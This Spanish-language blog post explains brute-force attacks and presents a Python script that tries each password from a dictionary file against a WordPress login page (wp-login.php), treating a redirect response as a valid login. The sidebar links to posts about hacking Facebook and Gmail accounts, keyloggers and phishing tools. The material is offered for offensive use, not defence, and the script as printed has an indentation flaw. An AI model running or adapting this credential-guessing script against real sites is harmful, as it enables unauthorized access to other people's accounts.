Seguidores

Wp hack WordPress


WP Hack WordPress


¿Qué es un ataque de fuerza bruta?

Un ataque de fuerza bruta, en criptografía, es la forma de recuperar una clave probando con todas las combinaciones posibles hasta encontrar la correcta.
Para realizar un ataque por fuerza bruta, se deben de tener en cuenta varios aspectos
La longitud de la palabra que deseamos obtener (en este caso usuario y contraseña)
El alfabeto utilizado para obtener todas las combinaciones posibles.
Por ejemplo, una contraseña consta de varios caracteres que pueden ser letras, números, caracteres especiales, etc. Para realizar este tipo de ataques se debe utilizar un diccionario de contraseñas.
El tamaño del diccionario dependerá de la posibilidad de encontrar la contraseña correcta pero también, el tiempo que tarde el ataque estará condicionado por el tamaño de dicho diccionario.
En el caso de hoy lo haremos mediante la realización de nuestro propio script en python pero, en otras ocasiones explicaremos como hacerlo con herramientas muy sencillas como WPScan o CMSmap.

Modulos utilizados para el script

Como ya sabéis, Python trabaja mediante el uso de módulos con los cuales obtener las funcionalidades que necesitemos en cada momento. En el caso de hoy, los módulos que vamos a utilzar son los siguientes:



Módulo Requests,  Urllib, Urllib2: Permiten interactuar con aplicaciones web. Trabajar con Métodos GET, POST, etc.

Módulo BeautifulSoup: Permite leer estructuras HTML / XML para extraer datos.

Módulo Re: Permite realizar búsquedas sobre expresiones regulares.

Módulo Socks: Permite realizar conexiones entre Cliente/Servidor.

Módulo Mechanize: Permite emular un navegador.

Módulo Cookielib: Permite manejar cookies de sesión y de esta manera poder trabajar directamente con la sesión del usuario.

Módulo Selenium: Interactúa con el  Navegador (Chrome, Firefox, etc.) para ejecutar tareas designadas.

Scrapy: Framework escrito en Python, orientado al proceso de descubrimiento de directorios, archivos. (Crawling). 

 crear nuestro script.
#!/usr/bin/python
# Importamos los modulos necesarios.
import requests
# Abrimos el diccionario.
dictionary = open("dictionary.txt","r")
# Leemos cada palabra del diccionario una a una.
for word in dictionary.readlines():
 #creamos una variable con los datos del POST

    data = {
        'log':'wordpress',
        'pwd':word.strip("\n")  
    }

    # Realizamos una peticion POST con los datos de wordpress.
    r = requests.post("http://wordpress.local/wp-login.php", data=data, allow_redirects=False)
     # Comprobamos si el resultado de la conexion nos devuelve un codigo 301 o 302.
    # Si el resultado es uno de estos dos codigos, la pass sera la correcta.
  
   if r.status_code in [301,302]:
        print "Las credenciales: wordpress : %s son validas" %(word.strip("\n"))
        break

    else:

        print "Las credenciales: wordpress : %s son invalidas" %(word.strip("\n"))

Lo primero será importar el módulo request, que como ya hemos mencionado antes, nos permite interactuar con aplicaciones web.
# Importamos los modulos necesarios.
import requests

Posteriormente, abriremos nuestro diccionario creado previamente, para poder realizar nuestro ataque

# Abrimos el diccionario.

dictionary = open("dictionary.txt","r")

Con todo esto, empezaremos a leer el diccionario para realizar nuestro ataque, para ello hemos utilizado un bucle for, que nos lea una a una todas las líneas de nuestro diccionario.

# Leemos cada palabra del diccionario una a una.

for word in dictionary.readlines():

Crearemos otro diccionario, en el cual guardaremos las credenciales 

    #creamos una variable con los datos del POST
    data = {
        'log':'wordpress',
        'pwd':word.strip("\n")  

    }   

Y realizaríamos la petición al formulario

    # Realizamos una peticion POST con los datos de wordpress.
    r = requests.post("http://wordpress.local/wp-login.php", data=data, allow_redirects=False)

Ahora, sólo nos queda comprobar la respuesta obtenida de la petición pero, ¿cómo podemos detectar que la conexión fue exitosa?. Esto podemos determinarlo a través de los códigos HTTP. Un código HTTP corresponde a la respuesta obtenida en base a la consulta realizada por el cliente, en el caso de una respuesta correcta, devolvería un código 200, en caso de un error ante un recurso inexistente nos devolvería un código 403 o 404, por otra parte, cuando se realizara una redirección, el código de respuesta sería 301 o 302.

Si lo llevamos a nuestro script, lo que nos interesa es conocer la petición cuando nos devuelva un código de redireccionamiento, porque lo esperado es acceder al panel de administración una vez nos hemos logueado. Con esto podemos observar que si nos devuelve un código de resultado 301 o 302 será porque nuestras credenciales son correctas. Podemos ver claramente la comprobación en nuestro script



# Comprobamos si el resultado de la conexion nos devuelve un codigo 301 o 302.

    # Si el resultado es uno de estos dos codigos, la pass sera la correcta.

    if r.status_code in [301,302]:

        print "Las credenciales: wordpress : %s son validas" %(word.strip("\n"))

        break

    else:

        print "Las credenciales: wordpress : %s son invalidas" %(word.strip("\n"))
Link wphack
Github



Comentarios

Sígueme en las redes sociales

Entradas populares de este blog

xploitz con un celular

Sockberus Autentificación de proxys

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Hackear facebook con keylogger c++ capturando datos

Descompilar aplicaciones apk con el programa ApkªDcx

Extraer las claves de wifi de windows

Darck y Guiza - framework para generar payloads

Bin Amino+gratis

APP IDE C++ mas utilizados para android

Programa Revealer Keylogger Pro

Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

xploitz

Programa Revealer Keylogger Pro

xploitz con un celular

​¿Quién soy?

Ataque de fuerza bruta Hack-Facebook

Extraer las claves de wifi de windows

Ataque de fuerza bruta para facebook con fb

Ataque de fuerza bruta a gmail con python

Keylogger con powershell en windows

Articulos

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

xploitz

xploitz con un celular

Programa Revealer Keylogger Pro

Ataque de fuerza bruta para facebook con fb

Ataque de fuerza bruta Hack-Facebook

WhatScriptApp Spam

Login y registro con php y base de datos mysql

Encontrar un nombre de usuario en más de 75 redes sociales con UserRecon

Termux Instalar y usar Shellphish

Newsletter

Hackear una cuenta de facebook

Aplicacion Facebook.exe Hackear una cuenta de facebook L7C

Información: Blogger https://lpericena.blogspot.com/ Github https://github.com/Pericena pinterest https://es.pinterest.com/lushiopericena/ twitter https://twitter.com/LPericena linkedin https://www.linkedin.com/in/luishi%C3%B1o-pericena-choque-126534116/ facebook https://www.facebook.com/profile.php?id=100009309755063 sitio web https://pericena.wordpress.com/ Aplicacion https://apps.facebook.com/167466933725219 contacto https://www.facebook.com/Servicio-T%C3%A9cnico-1506435219407506/ https://www.socialtools.me/index?action=demoApps&preview=1&app_id=406101 ask https://ask.fm/Lpericena soundcloud https://soundcloud.com/luishino-pericena-choque

Publicado por Servicio Técnico "The Seven Codes " en Sábado, 28 de octubre de 2017

Popular Posts

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

xploitz

xploitz con un celular

Hell & Ligth

Hell & Ligth
Vídeos Anime AMV

Servicio Técnico

Servicio Técnico
Servicio Técnico

PayPal